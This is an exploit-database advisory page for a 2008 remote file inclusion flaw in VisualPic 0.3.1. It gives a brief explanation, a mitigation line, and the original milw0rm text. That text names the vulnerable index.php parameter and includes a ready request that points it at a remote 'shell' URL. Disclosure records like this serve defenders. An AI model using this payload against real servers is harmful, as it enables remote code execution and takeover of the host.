header-logo
Suggest Exploit
vendor:
VisualPic
by:
Cr@zy_King
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: VisualPic
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:visualpic:visualpic:0.3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

VisualPic 0.3.1 Remote File Include

VisualPic 0.3.1 is vulnerable to a Remote File Include vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, containing arbitrary code which is then executed on the vulnerable server. The vulnerable code is located in the index.php file, where the include() function is used to include the file specified in the _CONFIG[files][functions_page] parameter.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

                                  -Coderx.Org-
                                [Digital-AngeLs] 

^| By Cr@zy_King / crazy_kinq@hotmail.co.uk \

^| Special Greatz All My Friends to str0ke \

^| VisualPic 0.3.1 Remote File Ä°nclude \

^| Down : http://www.snarky.fr/index.php?page=telechargement-2 \

^| Error : include($_CONFIG['files']['functions_page']) ; \

^| Files : index.php \

^| Rfi : http://localhost/?_CONFIG[files][functions_page]=http://shell \ 

# milw0rm.com [2008-04-05]

Navigation

Suggest Exploit

Services By CQR